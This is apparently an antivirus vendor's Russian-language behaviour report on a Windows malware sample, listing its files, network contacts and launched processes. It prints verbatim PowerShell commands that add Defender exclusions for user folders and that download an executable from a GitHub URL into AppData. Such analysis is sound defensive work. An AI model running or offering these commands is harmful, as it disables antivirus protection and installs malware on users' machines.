Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
добавляет исключения антивируса:
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\optdnggfin', 'C:\Users', '%ALLUSERSPROFILE%'"
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\bdc.tmp.exe
Сетевая активность
Подключается к
- 'po###to-me.com':443
- '18#.#1.61.10':80
TCP
Запросы HTTP GET
- http://18#.#1.61.10/ScreenSync.exe
Другие
- 'po###to-me.com':443
UDP
- DNS ASK po###to-me.com
Другое
Создает и запускает на исполнение
- '%TEMP%\bdc.tmp.exe'
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Add-MpPreference -ExclusionPath '%LOCALAPPDATA%\optdnggfin', 'C:\Users', '%ALLUSERSPROFILE%'"
- '<SYSTEM32>\cmd.exe' /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/romawer/raw/refs/heads/main/leohjawdjth.exe' -OutFile '%LOCALAPPDATA%\optdnggfin\Service.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/romawer/raw/refs/heads/main/leohjawdjth.exe' -OutFile '%LOCALAPPDATA%\optdnggfin\Service.exe'"
